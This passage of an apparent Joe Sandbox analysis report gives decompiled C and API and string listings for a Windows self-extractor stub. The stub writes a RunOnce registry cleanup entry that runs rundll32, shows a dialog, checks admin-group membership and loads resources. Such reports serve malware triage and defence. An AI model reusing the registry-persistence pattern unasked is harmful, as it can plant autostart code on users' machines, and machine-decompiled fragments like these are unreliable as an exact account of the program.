                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0xa08530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E00A0658A( &_v268, 0x104, 0xa01140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            							E00A0171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a02272
                                                                                                                                                                                                                                            0x00a02277
                                                                                                                                                                                                                                            0x00a02279
                                                                                                                                                                                                                                            0x00a02283
                                                                                                                                                                                                                                            0x00a02289
                                                                                                                                                                                                                                            0x00a022ab
                                                                                                                                                                                                                                            0x00a022b1
                                                                                                                                                                                                                                            0x00a022c4
                                                                                                                                                                                                                                            0x00a022e0
                                                                                                                                                                                                                                            0x00a022e6
                                                                                                                                                                                                                                            0x00a022f5
                                                                                                                                                                                                                                            0x00a0230d
                                                                                                                                                                                                                                            0x00a0231c
                                                                                                                                                                                                                                            0x00a0231c
                                                                                                                                                                                                                                            0x00a02321
                                                                                                                                                                                                                                            0x00a0233a
                                                                                                                                                                                                                                            0x00a02342
                                                                                                                                                                                                                                            0x00a02348
                                                                                                                                                                                                                                            0x00a0234b
                                                                                                                                                                                                                                            0x00a0234c
                                                                                                                                                                                                                                            0x00a0234c
                                                                                                                                                                                                                                            0x00a0234e
                                                                                                                                                                                                                                            0x00a0234f
                                                                                                                                                                                                                                            0x00a0236e
                                                                                                                                                                                                                                            0x00a0236e
                                                                                                                                                                                                                                            0x00a0237a
                                                                                                                                                                                                                                            0x00a02380
                                                                                                                                                                                                                                            0x00a02380
                                                                                                                                                                                                                                            0x00a02381
                                                                                                                                                                                                                                            0x00a02381
                                                                                                                                                                                                                                            0x00a0238f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A022A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00A022D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A022F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A02305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A0236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A0237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • wextract_cleanup1, xrefs: 00A0227C, 00A022CD, 00A02363
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A02321
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A02299
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A0232D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 3027380567-2601155950
                                                                                                                                                                                                                                            • Opcode ID: bfb5033e231e6169f73a4d5a94a1587ad54701c970b7fcb743de390f35d97a15
                                                                                                                                                                                                                                            • Instruction ID: eb38ca96b3538afc2fdda077133c09a733e3885ce8931be7835dbd46aac317e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfb5033e231e6169f73a4d5a94a1587ad54701c970b7fcb743de390f35d97a15
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85319571A0031C7BDB21DF51EC89FEB7B7CEB54700F0401A9B54DAA091EA75AB8ACB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00A03100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0xa08590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0xa08590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E00A043D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0xa08d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0xa088b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E00A030C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x00a03108
                                                                                                                                                                                                                                            0x00a0310b
                                                                                                                                                                                                                                            0x00a031b7
                                                                                                                                                                                                                                            0x00a031ca
                                                                                                                                                                                                                                            0x00a031d0
                                                                                                                                                                                                                                            0x00a031d0
                                                                                                                                                                                                                                            0x00a031da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a031da
                                                                                                                                                                                                                                            0x00a03111
                                                                                                                                                                                                                                            0x00a03114
                                                                                                                                                                                                                                            0x00a03136
                                                                                                                                                                                                                                            0x00a03136
                                                                                                                                                                                                                                            0x00a03138
                                                                                                                                                                                                                                            0x00a0313b
                                                                                                                                                                                                                                            0x00a03141
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03143
                                                                                                                                                                                                                                            0x00a03116
                                                                                                                                                                                                                                            0x00a0311b
                                                                                                                                                                                                                                            0x00a0314b
                                                                                                                                                                                                                                            0x00a03151
                                                                                                                                                                                                                                            0x00a03158
                                                                                                                                                                                                                                            0x00a0316a
                                                                                                                                                                                                                                            0x00a03176
                                                                                                                                                                                                                                            0x00a0317d
                                                                                                                                                                                                                                            0x00a0318b
                                                                                                                                                                                                                                            0x00a0319e
                                                                                                                                                                                                                                            0x00a031a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a031ad
                                                                                                                                                                                                                                            0x00a03120
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0312a
                                                                                                                                                                                                                                            0x00a03134
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03134
                                                                                                                                                                                                                                            0x00a0312c
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A0313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A0314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 00A0316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A03176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A0317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00A03185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00A03190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00A030C0), ref: 00A031A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A031CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 07674ab49649a1a81917347a78dd8e61cfe4ad48f4d8c0ecb01346bafffe99e5
                                                                                                                                                                                                                                            • Instruction ID: 96bc16b275147a1acde23320132d8b9426036b8c142ada7341505768d7a7e693
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07674ab49649a1a81917347a78dd8e61cfe4ad48f4d8c0ecb01346bafffe99e5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11BE3220421DBBDF11DFA4BC0CB9A3A68FB6E720F100720F855911E0DBB49A83C786
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E00A018A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0xa08128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E00A06CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A017EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0xa08128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa08128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a018a3
                                                                                                                                                                                                                                            0x00a018a3
                                                                                                                                                                                                                                            0x00a018ab
                                                                                                                                                                                                                                            0x00a018b2
                                                                                                                                                                                                                                            0x00a018b5
                                                                                                                                                                                                                                            0x00a018be
                                                                                                                                                                                                                                            0x00a018c0
                                                                                                                                                                                                                                            0x00a018c6
                                                                                                                                                                                                                                            0x00a018c7
                                                                                                                                                                                                                                            0x00a018ca
                                                                                                                                                                                                                                            0x00a018cf
                                                                                                                                                                                                                                            0x00a019c9
                                                                                                                                                                                                                                            0x00a019d8
                                                                                                                                                                                                                                            0x00a019d8
                                                                                                                                                                                                                                            0x00a018df
                                                                                                                                                                                                                                            0x00a019b8
                                                                                                                                                                                                                                            0x00a019bd
                                                                                                                                                                                                                                            0x00a019bf
                                                                                                                                                                                                                                            0x00a019bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a019bd
                                                                                                                                                                                                                                            0x00a018fa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01912
                                                                                                                                                                                                                                            0x00a019aa
                                                                                                                                                                                                                                            0x00a019ad
                                                                                                                                                                                                                                            0x00a019b3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01927
                                                                                                                                                                                                                                            0x00a01927
                                                                                                                                                                                                                                            0x00a01932
                                                                                                                                                                                                                                            0x00a01936
                                                                                                                                                                                                                                            0x00a019a9
                                                                                                                                                                                                                                            0x00a019a9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a019a9
                                                                                                                                                                                                                                            0x00a0194c
                                                                                                                                                                                                                                            0x00a019a2
                                                                                                                                                                                                                                            0x00a019a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0196e
                                                                                                                                                                                                                                            0x00a01970
                                                                                                                                                                                                                                            0x00a01999
                                                                                                                                                                                                                                            0x00a0199c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0199c
                                                                                                                                                                                                                                            0x00a01972
                                                                                                                                                                                                                                            0x00a01972
                                                                                                                                                                                                                                            0x00a01975
                                                                                                                                                                                                                                            0x00a01984
                                                                                                                                                                                                                                            0x00a01985
                                                                                                                                                                                                                                            0x00a0198a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0198c
                                                                                                                                                                                                                                            0x00a01991
                                                                                                                                                                                                                                            0x00a01996
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01996
                                                                                                                                                                                                                                            0x00a0194c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A018DD), ref: 00A0181A
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A0182C
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: AllocateAndInitializeSid.ADVAPI32(00A018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A018DD), ref: 00A01855
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: FreeSid.ADVAPI32(?,?,?,?,00A018DD), ref: 00A01883
                                                                                                                                                                                                                                              • Part of subcall function 00A017EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A018DD), ref: 00A0188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A018EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A018F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A0190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00A01918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A0192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A01944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A01964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 00A0197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00A0199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A019A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A019AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: cad11e3810083deebf7d21496317f410d3e5fcd2ebe1750a76d7a9a547d1914e
                                                                                                                                                                                                                                            • Instruction ID: bc0d88b9c437f26ae8f6056958f17dda9c105a8aef9b9c71d61594154b5d7c1d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cad11e3810083deebf7d21496317f410d3e5fcd2ebe1750a76d7a9a547d1914e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4311871A0020DABDB20DFE5EC98AEFBBB8FF18744F504429E545D2190DB349906CB65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A0468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a04699
                                                                                                                                                                                                                                            0x00a0469b
                                                                                                                                                                                                                                            0x00a046a9
                                                                                                                                                                                                                                            0x00a046af
                                                                                                                                                                                                                                            0x00a046b4
                                                                                                                                                                                                                                            0x00a046bc
                                                                                                                                                                                                                                            0x00a046f9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a046f9
                                                                                                                                                                                                                                            0x00a046d9
                                                                                                                                                                                                                                            0x00a046dd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a046e5
                                                                                                                                                                                                                                            0x00a046ef
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a046f5
                                                                                                                                                                                                                                            0x00a046ff

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
